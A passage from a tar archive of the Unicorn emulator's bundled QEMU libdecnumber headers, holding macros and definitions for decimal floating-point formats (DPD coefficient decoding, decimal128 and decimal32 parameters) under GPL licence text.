*/ #if (DECNUMMAXP != DEC_MAX_DIGITS) #error Maximum digits mismatch #endif #if (DECNUMMAXE != DEC_MAX_EMAX) #error Maximum exponent mismatch #endif #if (DECNUMMINE != DEC_MIN_EMIN) #error Minimum exponent mismatch #endif /* Set DECDPUNMAX -- the maximum integer that fits in DECDPUN */ /* digits, and D2UTABLE -- the initializer for the D2U table */ #if DECDPUN==1 #define DECDPUNMAX 9 #define D2UTABLE {0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, \ 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, \ 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, \ 48,49} #elif DECDPUN==2 #define DECDPUNMAX 99 #define D2UTABLE {0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10, \ 11,11,12,12,13,13,14,14,15,15,16,16,17,17,18, \ 18,19,19,20,20,21,21,22,22,23,23,24,24,25} #elif DECDPUN==3 #define DECDPUNMAX 999 #define D2UTABLE {0,1,1,1,2,2,2,3,3,3,4,4,4,5,5,5,6,6,6,7,7,7, \ 8,8,8,9,9,9,10,10,10,11,11,11,12,12,12,13,13, \ 13,14,14,14,15,15,15,16,16,16,17} #elif DECDPUN==4 #define DECDPUNMAX 9999 #define D2UTABLE {0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,6, \ 6,6,6,7,7,7,7,8,8,8,8,9,9,9,9,10,10,10,10,11, \ 11,11,11,12,12,12,12,13} #elif DECDPUN==5 #define DECDPUNMAX 99999 #define D2UTABLE {0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3,4,4,4,4,4,5, \ 5,5,5,5,6,6,6,6,6,7,7,7,7,7,8,8,8,8,8,9,9,9, \ 9,9,10,10,10,10} #elif DECDPUN==6 #define DECDPUNMAX 999999 #define D2UTABLE {0,1,1,1,1,1,1,2,2,2,2,2,2,3,3,3,3,3,3,4,4,4, \ 4,4,4,5,5,5,5,5,5,6,6,6,6,6,6,7,7,7,7,7,7,8, \ 8,8,8,8,8,9} #elif DECDPUN==7 #define DECDPUNMAX 9999999 #define D2UTABLE {0,1,1,1,1,1,1,1,2,2,2,2,2,2,2,3,3,3,3,3,3,3, \ 4,4,4,4,4,4,4,5,5,5,5,5,5,5,6,6,6,6,6,6,6,7, \ 7,7,7,7,7,7} #elif DECDPUN==8 #define DECDPUNMAX 99999999 #define D2UTABLE {0,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,3,3,3,3,3, \ 3,3,3,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5,5,6,6,6, \ 6,6,6,6,6,7} #elif DECDPUN==9 #define DECDPUNMAX 999999999 #define D2UTABLE {0,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,3,3,3, \ 3,3,3,3,3,3,4,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5, \ 5,5,6,6,6,6} #elif defined(DECDPUN) #error DECDPUN must be in the range 1-9 #endif /* ----- Shared data (in decNumber.c) ----- */ /* Public lookup table used by the D2U macro (see below) */ #define DECMAXD2U 49 extern const uByte d2utable[DECMAXD2U+1]; /* ----- Macros ----- */ /* ISZERO -- return true if decNumber dn is a zero */ /* [performance-critical in some situations] */ #define ISZERO(dn) decNumberIsZero(dn) /* now just a local name */ /* D2U -- return the number of Units needed to hold d digits */ /* (runtime version, with table lookaside for small d) */ #if DECDPUN==8 #define D2U(d) ((unsigned)((d)<=DECMAXD2U?d2utable[d]:((d)+7)>>3)) #elif DECDPUN==4 #define D2U(d) ((unsigned)((d)<=DECMAXD2U?d2utable[d]:((d)+3)>>2)) #else #define D2U(d) ((d)<=DECMAXD2U?d2utable[d]:((d)+DECDPUN-1)/DECDPUN) #endif /* SD2U -- static D2U macro (for compile-time calculation) */ #define SD2U(d) (((d)+DECDPUN-1)/DECDPUN) /* MSUDIGITS -- returns digits in msu, from digits, calculated */ /* using D2U */ #define MSUDIGITS(d) ((d)-(D2U(d)-1)*DECDPUN) /* D2N -- return the number of decNumber structs that would be */ /* needed to contain that number of digits (and the initial */ /* decNumber struct) safely. Note that one Unit is included in the */ /* initial structure. Used for allocating space that is aligned on */ /* a decNumber struct boundary. */ #define D2N(d) \ ((((SD2U(d)-1)*sizeof(Unit))+sizeof(decNumber)*2-1)/sizeof(decNumber)) /* TODIGIT -- macro to remove the leading digit from the unsigned */ /* integer u at column cut (counting from the right, LSD=0) and */ /* place it as an ASCII character into the character pointed to by */ /* c. Note that cut must be <= 9, and the maximum value for u is */ /* 2,000,000,000 (as is needed for negative exponents of */ /* subnormals). The unsigned integer pow is used as a temporary */ /* variable. */ #define TODIGIT(u, cut, c, pow) { \ *(c)='0'; \ pow=DECPOWERS[cut]*2; \ if ((u)>pow) { \ pow*=4; \ if ((u)>=pow) {(u)-=pow; *(c)+=8;} \ pow/=2; \ if ((u)>=pow) {(u)-=pow; *(c)+=4;} \ pow/=2; \ } \ if ((u)>=pow) {(u)-=pow; *(c)+=2;} \ pow/=2; \ if ((u)>=pow) {(u)-=pow; *(c)+=1;} \ } /* ---------------------------------------------------------------- */ /* Definitions for fixed-precision modules (only valid after */ /* decSingle.h, decDouble.h, or decQuad.h has been included) */ /* ---------------------------------------------------------------- */ /* bcdnum -- a structure describing a format-independent finite */ /* number, whose coefficient is a string of bcd8 uBytes */ typedef struct { uByte *msd; /* -> most significant digit */ uByte *lsd; /* -> least ditto */ uInt sign; /* 0=positive, DECFLOAT_Sign=negative */ Int exponent; /* Unadjusted signed exponent (q), or */ /* DECFLOAT_NaN etc. for a special */ } bcdnum; /* Test if exponent or bcdnum exponent must be a special, etc. */ #define EXPISSPECIAL(exp) ((exp)>=DECFLOAT_MinSp) #define EXPISINF(exp) (exp==DECFLOAT_Inf) #define EXPISNAN(exp) (exp==DECFLOAT_qNaN || exp==DECFLOAT_sNaN) #define NUMISSPECIAL(num) (EXPISSPECIAL((num)->exponent)) /* Refer to a 32-bit word or byte in a decFloat (df) by big-endian */ /* (array) notation (the 0 word or byte contains the sign bit), */ /* automatically adjusting for endianness; similarly address a word */ /* in the next-wider format (decFloatWider, or dfw) */ #define DECWORDS (DECBYTES/4) #define DECWWORDS (DECWBYTES/4) #if DECLITEND #define DFWORD(df, off) ((df)->words[DECWORDS-1-(off)]) #define DFBYTE(df, off) ((df)->bytes[DECBYTES-1-(off)]) #define DFWWORD(dfw, off) ((dfw)->words[DECWWORDS-1-(off)]) #else #define DFWORD(df, off) ((df)->words[off]) #define DFBYTE(df, off) ((df)->bytes[off]) #define DFWWORD(dfw, off) ((dfw)->words[off]) #endif /* Tests for sign or specials, directly on DECFLOATs */ #define DFISSIGNED(df) (DFWORD(df, 0)&0x80000000) #define DFISSPECIAL(df) ((DFWORD(df, 0)&0x78000000)==0x78000000) #define DFISINF(df) ((DFWORD(df, 0)&0x7c000000)==0x78000000) #define DFISNAN(df) ((DFWORD(df, 0)&0x7c000000)==0x7c000000) #define DFISQNAN(df) ((DFWORD(df, 0)&0x7e000000)==0x7c000000) #define DFISSNAN(df) ((DFWORD(df, 0)&0x7e000000)==0x7e000000) /* Shared lookup tables */ extern const uInt DECCOMBMSD[64]; /* Combination field -> MSD */ extern const uInt DECCOMBFROM[48]; /* exp+msd -> Combination */ /* Private generic (utility) routine */ #if DECCHECK || DECTRACE extern void decShowNum(const bcdnum *, const char *); #endif /* Format-dependent macros and constants */ #if defined(DECPMAX) /* Useful constants */ #define DECPMAX9 (ROUNDUP(DECPMAX, 9)/9) /* 'Pmax' in 10**9s */ /* Top words for a zero */ #define SINGLEZERO 0x22500000 #define DOUBLEZERO 0x22380000 #define QUADZERO 0x22080000 /* [ZEROWORD is defined to be one of these in the DFISZERO macro] */ /* Format-dependent common tests: */ /* DFISZERO -- test for (any) zero */ /* DFISCCZERO -- test for coefficient continuation being zero */ /* DFISCC01 -- test for coefficient contains only 0s and 1s */ /* DFISINT -- test for finite and exponent q=0 */ /* DFISUINT01 -- test for sign=0, finite, exponent q=0, and */ /* MSD=0 or 1 */ /* ZEROWORD is also defined here. */ /* In DFISZERO the first test checks the least-significant word */ /* (most likely to be non-zero); the penultimate tests MSD and */ /* DPDs in the signword, and the final test excludes specials and */ /* MSD>7. DFISINT similarly has to allow for the two forms of */ /* MSD codes. DFISUINT01 only has to allow for one form of MSD */ /* code. */ #if DECPMAX==7 #define ZEROWORD SINGLEZERO /* [test macros not needed except for Zero] */ #define DFISZERO(df) ((DFWORD(df, 0)&0x1c0fffff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000) #elif DECPMAX==16 #define ZEROWORD DOUBLEZERO #define DFISZERO(df) ((DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x1c03ffff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000)) #define DFISINT(df) ((DFWORD(df, 0)&0x63fc0000)==0x22380000 \ ||(DFWORD(df, 0)&0x7bfc0000)==0x6a380000) #define DFISUINT01(df) ((DFWORD(df, 0)&0xfbfc0000)==0x22380000) #define DFISCCZERO(df) (DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x0003ffff)==0) #define DFISCC01(df) ((DFWORD(df, 0)&~0xfffc9124)==0 \ && (DFWORD(df, 1)&~0x49124491)==0) #elif DECPMAX==34 #define ZEROWORD QUADZERO #define DFISZERO(df) ((DFWORD(df, 3)==0 \ && DFWORD(df, 2)==0 \ && DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x1c003fff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000)) #define DFISINT(df) ((DFWORD(df, 0)&0x63ffc000)==0x22080000 \ ||(DFWORD(df, 0)&0x7bffc000)==0x6a080000) #define DFISUINT01(df) ((DFWORD(df, 0)&0xfbffc000)==0x22080000) #define DFISCCZERO(df) (DFWORD(df, 3)==0 \ && DFWORD(df, 2)==0 \ && DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x00003fff)==0) #define DFISCC01(df) ((DFWORD(df, 0)&~0xffffc912)==0 \ && (DFWORD(df, 1)&~0x44912449)==0 \ && (DFWORD(df, 2)&~0x12449124)==0 \ && (DFWORD(df, 3)&~0x49124491)==0) #endif /* Macros to test if a certain 10 bits of a uInt or pair of uInts */ /* are a canonical declet [higher or lower bits are ignored]. */ /* declet is at offset 0 (from the right) in a uInt: */ #define CANONDPD(dpd) (((dpd)&0x300)==0 || ((dpd)&0x6e)!=0x6e) /* declet is at offset k (a multiple of 2) in a uInt: */ #define CANONDPDOFF(dpd, k) (((dpd)&(0x300<<(k)))==0 \ || ((dpd)&(((uInt)0x6e)<<(k)))!=(((uInt)0x6e)<<(k))) /* declet is at offset k (a multiple of 2) in a pair of uInts: */ /* [the top 2 bits will always be in the more-significant uInt] */ #define CANONDPDTWO(hi, lo, k) (((hi)&(0x300>>(32-(k))))==0 \ || ((hi)&(0x6e>>(32-(k))))!=(0x6e>>(32-(k))) \ || ((lo)&(((uInt)0x6e)<<(k)))!=(((uInt)0x6e)<<(k))) /* Macro to test whether a full-length (length DECPMAX) BCD8 */ /* coefficient is zero */ /* test just the LSWord first, then the remainder */ #if DECPMAX==7 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && UINTAT((u)+DECPMAX-7)==0) #elif DECPMAX==16 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && (UINTAT((u)+DECPMAX-8)+UINTAT((u)+DECPMAX-12) \ +UINTAT((u)+DECPMAX-16))==0) #elif DECPMAX==34 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && (UINTAT((u)+DECPMAX-8) +UINTAT((u)+DECPMAX-12) \ +UINTAT((u)+DECPMAX-16)+UINTAT((u)+DECPMAX-20) \ +UINTAT((u)+DECPMAX-24)+UINTAT((u)+DECPMAX-28) \ +UINTAT((u)+DECPMAX-32)+USHORTAT((u)+DECPMAX-34))==0) #endif /* Macros and masks for the exponent continuation field and MSD */ /* Get the exponent continuation from a decFloat *df as an Int */ #define GETECON(df) ((Int)((DFWORD((df), 0)&0x03ffffff)>>(32-6-DECECONL))) /* Ditto, from the next-wider format */ #define GETWECON(df) ((Int)((DFWWORD((df), 0)&0x03ffffff)>>(32-6-DECWECONL))) /* Get the biased exponent similarly */ #define GETEXP(df) ((Int)(DECCOMBEXP[DFWORD((df), 0)>>26]+GETECON(df))) /* Get the unbiased exponent similarly */ #define GETEXPUN(df) ((Int)GETEXP(df)-DECBIAS) /* Get the MSD similarly (as uInt) */ #define GETMSD(df) (DECCOMBMSD[DFWORD((df), 0)>>26]) /* Compile-time computes of the exponent continuation field masks */ /* full exponent continuation field: */ #define ECONMASK ((0x03ffffff>>(32-6-DECECONL))<<(32-6-DECECONL)) /* same, not including its first digit (the qNaN/sNaN selector): */ #define ECONNANMASK ((0x01ffffff>>(32-6-DECECONL))<<(32-6-DECECONL)) /* Macros to decode the coefficient in a finite decFloat *df into */ /* a BCD string (uByte *bcdin) of length DECPMAX uBytes */ /* In-line sequence to convert 10 bits at right end of uInt dpd */ /* to three BCD8 digits starting at uByte u. Note that an extra */ /* byte is written to the right of the three digits because this */ /* moves four at a time for speed; the alternative macro moves */ /* exactly three bytes */ #define dpd2bcd8(u, dpd) { \ UINTAT(u)=UINTAT(&DPD2BCD8[((dpd)&0x3ff)*4]);} #define dpd2bcd83(u, dpd) { \ *(u)=DPD2BCD8[((dpd)&0x3ff)*4]; \ *(u+1)=DPD2BCD8[((dpd)&0x3ff)*4+1]; \ *(u+2)=DPD2BCD8[((dpd)&0x3ff)*4+2];} /* Decode the declets. After extracting each one, it is decoded */ /* to BCD8 using a table lookup (also used for variable-length */ /* decode). Each DPD decode is 3 bytes BCD8 plus a one-byte */ /* length which is not used, here). Fixed-length 4-byte moves */ /* are fast, however, almost everywhere, and so are used except */ /* for the final three bytes (to avoid overrun). The code below */ /* is 36 instructions for Doubles and about 70 for Quads, even */ /* on IA32. */ /* Two macros are defined for each format: */ /* GETCOEFF extracts the coefficient of the current format */ /* GETWCOEFF extracts the coefficient of the next-wider format. */ /* The latter is a copy of the next-wider GETCOEFF using DFWWORD. */ #if DECPMAX==7 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>10); \ dpd2bcd83(bcd+4, sourhi);} #define GETWCOEFF(df, bcd) { \ uInt sourhi=DFWWORD(df, 0); \ uInt sourlo=DFWWORD(df, 1); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>8); \ dpd2bcd8(bcd+4, (sourhi<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+7, sourlo>>20); \ dpd2bcd8(bcd+10, sourlo>>10); \ dpd2bcd83(bcd+13, sourlo);} #elif DECPMAX==16 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ uInt sourlo=DFWORD(df, 1); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>8); \ dpd2bcd8(bcd+4, (sourhi<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+7, sourlo>>20); \ dpd2bcd8(bcd+10, sourlo>>10); \ dpd2bcd83(bcd+13, sourlo);} #define GETWCOEFF(df, bcd) { \ uInt sourhi=DFWWORD(df, 0); \ uInt sourmh=DFWWORD(df, 1); \ uInt sourml=DFWWORD(df, 2); \ uInt sourlo=DFWWORD(df, 3); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>4); \ dpd2bcd8(bcd+4, ((sourhi)<<6) | (sourmh>>26)); \ dpd2bcd8(bcd+7, sourmh>>16); \ dpd2bcd8(bcd+10, sourmh>>6); \ dpd2bcd8(bcd+13, ((sourmh)<<4) | (sourml>>28)); \ dpd2bcd8(bcd+16, sourml>>18); \ dpd2bcd8(bcd+19, sourml>>8); \ dpd2bcd8(bcd+22, ((sourml)<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+25, sourlo>>20); \ dpd2bcd8(bcd+28, sourlo>>10); \ dpd2bcd83(bcd+31, sourlo);} #elif DECPMAX==34 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ uInt sourmh=DFWORD(df, 1); \ uInt sourml=DFWORD(df, 2); \ uInt sourlo=DFWORD(df, 3); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>4); \ dpd2bcd8(bcd+4, ((sourhi)<<6) | (sourmh>>26)); \ dpd2bcd8(bcd+7, sourmh>>16); \ dpd2bcd8(bcd+10, sourmh>>6); \ dpd2bcd8(bcd+13, ((sourmh)<<4) | (sourml>>28)); \ dpd2bcd8(bcd+16, sourml>>18); \ dpd2bcd8(bcd+19, sourml>>8); \ dpd2bcd8(bcd+22, ((sourml)<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+25, sourlo>>20); \ dpd2bcd8(bcd+28, sourlo>>10); \ dpd2bcd83(bcd+31, sourlo);} #define GETWCOEFF(df, bcd) {??} /* [should never be used] */ #endif /* Macros to decode the coefficient in a finite decFloat *df into */ /* a base-billion uInt array, with the least-significant */ /* 0-999999999 'digit' at offset 0. */ /* Decode the declets. After extracting each one, it is decoded */ /* to binary using a table lookup. Three tables are used; one */ /* the usual DPD to binary, the other two pre-multiplied by 1000 */ /* and 1000000 to avoid multiplication during decode. These */ /* tables can also be used for multiplying up the MSD as the DPD */ /* code for 0 through 9 is the identity. */ #define DPD2BIN0 DPD2BIN /* for prettier code */ #if DECPMAX==7 #define GETCOEFFBILL(df, buf) { \ uInt sourhi=DFWORD(df, 0); \ (buf)[0]=DPD2BIN0[sourhi&0x3ff] \ +DPD2BINK[(sourhi>>10)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #elif DECPMAX==16 #define GETCOEFFBILL(df, buf) { \ uInt sourhi, sourlo; \ sourlo=DFWORD(df, 1); \ (buf)[0]=DPD2BIN0[sourlo&0x3ff] \ +DPD2BINK[(sourlo>>10)&0x3ff] \ +DPD2BINM[(sourlo>>20)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[1]=DPD2BIN0[((sourhi<<2) | (sourlo>>30))&0x3ff] \ +DPD2BINK[(sourhi>>8)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #elif DECPMAX==34 #define GETCOEFFBILL(df, buf) { \ uInt sourhi, sourmh, sourml, sourlo; \ sourlo=DFWORD(df, 3); \ (buf)[0]=DPD2BIN0[sourlo&0x3ff] \ +DPD2BINK[(sourlo>>10)&0x3ff] \ +DPD2BINM[(sourlo>>20)&0x3ff]; \ sourml=DFWORD(df, 2); \ (buf)[1]=DPD2BIN0[((sourml<<2) | (sourlo>>30))&0x3ff] \ +DPD2BINK[(sourml>>8)&0x3ff] \ +DPD2BINM[(sourml>>18)&0x3ff]; \ sourmh=DFWORD(df, 1); \ (buf)[2]=DPD2BIN0[((sourmh<<4) | (sourml>>28))&0x3ff] \ +DPD2BINK[(sourmh>>6)&0x3ff] \ +DPD2BINM[(sourmh>>16)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[3]=DPD2BIN0[((sourhi<<6) | (sourmh>>26))&0x3ff] \ +DPD2BINK[(sourhi>>4)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #endif /* Macros to decode the coefficient in a finite decFloat *df into */ /* a base-thousand uInt array, with the least-significant 0-999 */ /* 'digit' at offset 0. */ /* Decode the declets. After extracting each one, it is decoded */ /* to binary using a table lookup. */ #if DECPMAX==7 #define GETCOEFFTHOU(df, buf) { \ uInt sourhi=DFWORD(df, 0); \ (buf)[0]=DPD2BIN[sourhi&0x3ff]; \ (buf)[1]=DPD2BIN[(sourhi>>10)&0x3ff]; \ (buf)[2]=DECCOMBMSD[sourhi>>26];} #elif DECPMAX==16 #define GETCOEFFTHOU(df, buf) { \ uInt sourhi, sourlo; \ sourlo=DFWORD(df, 1); \ (buf)[0]=DPD2BIN[sourlo&0x3ff]; \ (buf)[1]=DPD2BIN[(sourlo>>10)&0x3ff]; \ (buf)[2]=DPD2BIN[(sourlo>>20)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[3]=DPD2BIN[((sourhi<<2) | (sourlo>>30))&0x3ff]; \ (buf)[4]=DPD2BIN[(sourhi>>8)&0x3ff]; \ (buf)[5]=DECCOMBMSD[sourhi>>26];} #elif DECPMAX==34 #define GETCOEFFTHOU(df, buf) { \ uInt sourhi, sourmh, sourml, sourlo; \ sourlo=DFWORD(df, 3); \ (buf)[0]=DPD2BIN[sourlo&0x3ff]; \ (buf)[1]=DPD2BIN[(sourlo>>10)&0x3ff]; \ (buf)[2]=DPD2BIN[(sourlo>>20)&0x3ff]; \ sourml=DFWORD(df, 2); \ (buf)[3]=DPD2BIN[((sourml<<2) | (sourlo>>30))&0x3ff]; \ (buf)[4]=DPD2BIN[(sourml>>8)&0x3ff]; \ (buf)[5]=DPD2BIN[(sourml>>18)&0x3ff]; \ sourmh=DFWORD(df, 1); \ (buf)[6]=DPD2BIN[((sourmh<<4) | (sourml>>28))&0x3ff]; \ (buf)[7]=DPD2BIN[(sourmh>>6)&0x3ff]; \ (buf)[8]=DPD2BIN[(sourmh>>16)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[9]=DPD2BIN[((sourhi<<6) | (sourmh>>26))&0x3ff]; \ (buf)[10]=DPD2BIN[(sourhi>>4)&0x3ff]; \ (buf)[11]=DECCOMBMSD[sourhi>>26];} #endif /* Set a decFloat to the maximum positive finite number (Nmax) */ #if DECPMAX==7 #define DFSETNMAX(df) \ {DFWORD(df, 0)=0x77f3fcff;} #elif DECPMAX==16 #define DFSETNMAX(df) \ {DFWORD(df, 0)=0x77fcff3f; \ DFWORD(df, 1)=0xcff3fcff;} #elif DECPMAX==34 #define DFSETNMAX(df) \ {DFWORD(df, 0)=0x77ffcff3; \ DFWORD(df, 1)=0xfcff3fcf; \ DFWORD(df, 2)=0xf3fcff3f; \ DFWORD(df, 3)=0xcff3fcff;} #endif /* [end of format-dependent macros and constants] */ #endif #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/��������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0021000�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal128.h��������������������������������������������0000664�0000000�0000000�00000010151�14675241067�0023000�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 128-bit format module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 128-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL128_H #define DECIMAL128_H #define DEC128NAME "decimal128" /* Short name */ #define DEC128FULLNAME "Decimal 128-bit Number" /* Verbose name */ #define DEC128AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal128s */ #define DECIMAL128_Bytes 16 /* length */ #define DECIMAL128_Pmax 34 /* maximum precision (digits) */ #define DECIMAL128_Emax 6144 /* maximum adjusted exponent */ #define DECIMAL128_Emin -6143 /* minimum adjusted exponent */ #define DECIMAL128_Bias 6176 /* bias for the exponent */ #define DECIMAL128_String 43 /* maximum string length, +1 */ #define DECIMAL128_EconL 12 /* exp. continuation length */ /* highest biased exponent (Elimit-1) */ #define DECIMAL128_Ehigh (DECIMAL128_Emax+DECIMAL128_Bias-DECIMAL128_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL128_Pmax) #error decimal128.h needs pre-defined DECNUMDIGITS>=34 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL128_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 128-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL128_Bytes]; /* decimal128: 1, 5, 12, 110 bits*/ } decimal128; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif #include "decimal128Local.h" /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal128 * decimal128FromString(decimal128 *, const char *, decContext *); char * decimal128ToString(const decimal128 *, char *); char * decimal128ToEngString(const decimal128 *, char *); /* decNumber conversions */ decimal128 * decimal128FromNumber(decimal128 *, const decNumber *, decContext *); decNumber * decimal128ToNumber(const decimal128 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal128IsCanonical(const decimal128 *); decimal128 * decimal128Canonical(decimal128 *, const decimal128 *); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal128Local.h���������������������������������������0000664�0000000�0000000�00000003524�14675241067�0023761�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Local definitions for use with the decNumber C Library. Copyright (C) 2007 Free Software Foundation, Inc. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #if !defined(DECIMAL128LOCAL) /* The compiler needs sign manipulation functions for decimal128 which are not part of the decNumber package. */ /* Set sign; this assumes the sign was previously zero. */ #define decimal128SetSign(d,b) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] |= ((unsigned) (b) << 7); } /* Clear sign. */ #define decimal128ClearSign(d) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] &= ~0x80; } /* Flip sign. */ #define decimal128FlipSign(d) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] ^= 0x80; } #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal32.h���������������������������������������������0000664�0000000�0000000�00000010011�14675241067�0022705�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 32-bit format module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 32-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL32_H #define DECIMAL32_H #define DEC32NAME "decimal32" /* Short name */ #define DEC32FULLNAME "Decimal 32-bit Number" /* Verbose name */ #define DEC32AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal32s */ #define DECIMAL32_Bytes 4 /* length */ #define DECIMAL32_Pmax 7 /* maximum precision (digits) */ #define DECIMAL32_Emax 96 /* maximum adjusted exponent */ #define DECIMAL32_Emin -95 /* minimum adjusted exponent */ #define DECIMAL32_Bias 101 /* bias for the exponent */ #define DECIMAL32_String 15 /* maximum string length, +1 */ #define DECIMAL32_EconL 6 /* exp. continuation length */ /* highest biased exponent 